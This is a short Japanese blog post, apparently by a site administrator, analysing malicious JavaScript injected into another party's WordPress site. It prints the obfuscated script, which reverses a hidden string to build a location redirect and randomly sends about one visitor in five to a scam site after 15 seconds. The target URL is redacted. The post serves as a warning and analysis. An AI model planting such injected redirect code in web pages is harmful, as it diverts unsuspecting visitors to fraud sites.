これはうちの管轄外のサイトで起きたことです。
可読性高くするために、改行等を加えてあります
<script>
$soq0ujYKWbanWY6nnjX=function(n){
if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string")
return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");
return $soq0ujYKWbanWY6nnjX.list[n];
};
$soq0ujYKWbanWY6nnjX.list=["\'URLとかを文字列反転したもの//:ptth\'=ferh.noitacol.tnemucod"];
var c=Math.floor(Math.random() * 5);
if (c==3){
var delay = 15000;
setTimeout($soq0ujYKWbanWY6nnjX(0), delay);
}
</script>
ちなみに、現在当該URLに行くと、BANされているせいか、not found になりますが、詐欺サイトがあった痕跡は残っています。
Wordpressの環境
バージョン4.9代と推定されます。
さいごに
セキュリティーはしっかりまもりましょう